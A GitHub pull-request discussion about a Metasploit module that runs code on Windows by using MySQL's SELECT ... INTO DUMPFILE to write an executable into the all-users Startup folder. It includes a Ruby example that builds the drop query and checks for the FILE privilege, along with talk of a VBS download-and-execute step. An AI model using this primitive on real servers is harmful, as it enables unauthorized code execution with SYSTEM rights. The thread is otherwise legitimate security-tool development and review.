Shameless variation (ripoff) on sinn3r's mysql_mof.rb module. #2156
Conversation
Thanks for the variant. I find the approach rather interesting, but I'd like to briefly discuss maybe there's a different way to implement your technique? Specifically the part where you have to set WfsDelay at a high value, and hopefully the user will login before time runs out. I was thinking maybe you can start up a HTTP server first using the HttpServer mixin, login to your target's MySQL and then drop a VBS script that will download+execute your actual executable from the HTTP server. That way your exploit module can wait indefinitely until the user logs in, so you no longer have to worry about time running out.
Wasn't nuts about the idea of setting WfsDelay to 259,200 either. ;) Sounds like a good idea to me. I'll get to coding and testing it this afternoon.
Since you can't ensure when there is going to be a session back, even when the target is vulnerable, it looks a little like a "fileformat" exploit, where the msf user is responsible for running a handler in order to get the sessions. Does it make sense? Maybe it also could be just an auxiliary module, which just drops files to the startup folders, and the msf user is responsible for running a handler to get sessions if he drops metasploit payloads. Just sharing thoughts :) This comment ISN'T a recommendation to modify this pull request! It's just discussion because I think it's an interesting topic. BTW, there are other exploits on the framework which drop payloads to Startup folders, like modules/exploits/windows/browser/enjoysapgui_comp_download.rb, modules/exploits/windows/browser/persits_xupload_traversal.rb, modules/exploits/windows/browser/symantec_altirideployment_downloadandinstall.rb, modules/exploits/windows/browser/zenturiprogramchecker.rb, modules/exploits/windows/misc/timbuktu_fileupload.rb, or modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
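Added example for the two comments above (the "drop a script that the login will run" idea and the "auxiliary module that just drops files into the Startup folder" variant). It is not code from this PR or from Metasploit; it only shows the write primitive these MySQL modules rest on, `SELECT ... INTO DUMPFILE` as used by mysql_mof, aimed at a Windows all-users Startup folder. The folder paths, the `StartupDrop` module name and the random filename scheme are assumptions for illustration. Nothing here connects to a server or writes to disk; it builds the SQL and checks the grant rows a caller would fetch first.

```ruby
# Added example (not code from PR #2156 or from Metasploit). Builds the
# SELECT ... INTO DUMPFILE statement that drops a file into a Windows
# all-users Startup folder over an already authenticated MySQL session,
# plus a check for the FILE privilege. Pure string handling: nothing here
# connects to a server or touches the filesystem.

require 'securerandom'

module StartupDrop
  # Default all-users Startup folders. Assumption: the target uses the
  # stock install paths; the landed module made this configurable.
  STARTUP_DIRS = {
    'xp'     => "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup",
    'vista+' => "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
  }.freeze

  # Takes the rows of SHOW GRANTS FOR CURRENT_USER() as plain strings and
  # reports whether the account holds FILE (or ALL PRIVILEGES) globally,
  # which INTO DUMPFILE requires. Database-scoped grants do not count.
  def self.can_write_files?(grant_rows)
    grant_rows.any? do |row|
      row.match?(/\AGRANT\s+(ALL\s+PRIVILEGES|.*\bFILE\b.*?)\s+ON\s+\*\.\*\s+TO/i)
    end
  end

  # Quote a Windows path as a MySQL string literal. MySQL treats backslash
  # as an escape character inside quotes, so each one is doubled.
  def self.sql_path_literal(path)
    "'" + path.gsub("\\") { "\\\\" }.gsub("'", "''") + "'"
  end

  # Statement that writes +data+ byte for byte to +path+. The content goes
  # over as a hex literal, so no byte needs quoting; DUMPFILE (unlike
  # OUTFILE) adds no line terminators or escaping to what it writes.
  def self.dumpfile_query(data, path)
    raise ArgumentError, 'empty payload' if data.empty? # "0x" alone is not a valid literal
    hex = data.unpack('H*').first
    "SELECT 0x#{hex} INTO DUMPFILE #{sql_path_literal(path)}"
  end

  # Full drop statement for one of the known Startup folders. The filename
  # is random because DUMPFILE refuses to overwrite an existing file.
  # Returns [path, query] so the caller can record what went where.
  def self.drop_query(data, target: 'vista+', ext: 'exe')
    dir  = STARTUP_DIRS.fetch(target)
    path = "#{dir}\\#{SecureRandom.hex(4)}.#{ext}"
    [path, dumpfile_query(data, path)]
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample of a SHOW GRANTS row, not captured from a real server.
  grants = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION"]
  puts "FILE write possible: #{StartupDrop.can_write_files?(grants)}"
  path, sql = StartupDrop.drop_query("MZ\x90\x00".b, target: 'xp')
  puts path
  puts sql
end
```

Two caveats a user of this primitive runs into: the file is created by the mysqld service account (SYSTEM on a default Windows install, which is why the author calls it "too good to pass up"), so the drop works only if that account can write the folder and only if the payload fits in `max_allowed_packet` as a single hex literal; and on servers where `secure_file_priv` is set, DUMPFILE is confined to that directory and the Startup folder is out of reach regardless of the FILE grant.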
Why not copy the bits from multi/handler exploit function and just wait for a response? Or make an indefinite_handler mixin to handle this? Or allow a WFSDelay -1 or 0 to wait indefinitely? Or how does ::Remote::TcpServer prevent the handler from closing? Ideally having additional download and execute HTTP channels should be avoided as it's another channel of communication that you have to get out from the host imo.
Meatballs1 - I'm not sure if you want WFSDelay to wait indefinitely because if this is used in autoexploit, I think it'll hang.
But an exploit that is unlikely to get an immediate response shouldn't be targeted in any auto-exploitation?
Exploits with a high WFSDelay value definitely get loaded by autoexploit. I can tell you how much I believe autoexploit needs a rewrite, but I don't think we can solve that today... or any day soon.
Whose autoexploit? Long running exploits are a thing sometimes, so it's up
|
Pro's. Adding long-running exploits only makes the user experience worse, so I'd avoid doing that. This is obviously commercial team's problem, but you can't cause something unusable and tell them to suck it :-) "Them" includes your users, too.
While I appreciate the concern, Pro's auto exploit mechanism has a user setting of I just don't want to slide into the business of accepting or denying useful open source exploits just because Pro might have a problem with it, since that kind of undercuts the credibility of Metasploit Framework as a truly free and open source platform for exploitation. @trosen-r7 feel free to confirm or deny. Tl;dr: if Incidentally, Pro (and Community) users also have the option of single exploit tasks; in this case, I want them to be able to run our exploits in the cases where it makes sense.
*slight edits on my comment for grammar
We're not denying anything. We're simply looking for a different way to write it. The main issue is that the wait time eventually runs out, and you miss getting a shell. It's better to just wait until the user logs in.
Oh, okay. I thought you were resisting a long WfsDelay because of concerns about long-running autoexploit functions, not because there's just a better way in general. If there's a better way, by all means.
@jvazquez-r7 - I see what you're driving at with regards to this behaving like a "fileformat" exploit (needs to wait for user interaction). My motivation for submitting this though was to provide msf users (who have obtained creds to a MySQL/Windows instance) another option for remote code exec since WbemExec doesn't support Vista+ yet. Writing to the file system as SYSTEM is just too good to pass up. :) So from an msf user's workflow standpoint, I would like to see it stay in exploit/windows/mysql as an alternative to mysql_payload and mysql_mof.
Currently this module, #1054 and possibly #2162 could use some form of indefinite wait for the handler. Should we look to provide a mixin for Msf::Exploit::IndefiniteWait or something? Or do we want to stick with the status quo (for file formats) that the user has to create their own multi-handler? This seems a bit backwards to me as you basically have to re-input your payload settings twice. Make a mistake on the port/payload type and things will fail.
@Meatballs1 - Your idea makes sense to me. Would it be as simple as grabbing the code from multi/handler's exploit method and tweaking it a bit?
What's up with this PR? :)
Not sure. It works, as is, for me. Totally understand if this doesn't
|
Nah, it's definitely useful. I think we just need to spend more time with it. Easy to let things languish accidentally.
Well, this PR has had a year to think things over and reflect on its inner self. We should close it or land it.
Offhand, there are a few issues:
|
@veritysr Do you want to take a crack at finishing this, or should we close the PR for now?
I'll make time to make those changes if there's still interest in including .
Thanks! Let me know when this is ready for another round and apologies for the delay.
On windows XP SP3:
On Windows 7:
|
I'm going to make the startup folder configurable, do minor cleanup and land! Work in progress!
Landed after some cleanup, see final result here: 3d20ea8 On XP SP3:
Thanks @veritysr (sorry for the long delay) and everyone who helped to review, finally landed! :-)
My bad for not testing more thoroughly. Thank you, @jvazquez-r7!
|
@sinn3r - Haven't got WbemExec working on Vista+ yet. Came up with this though.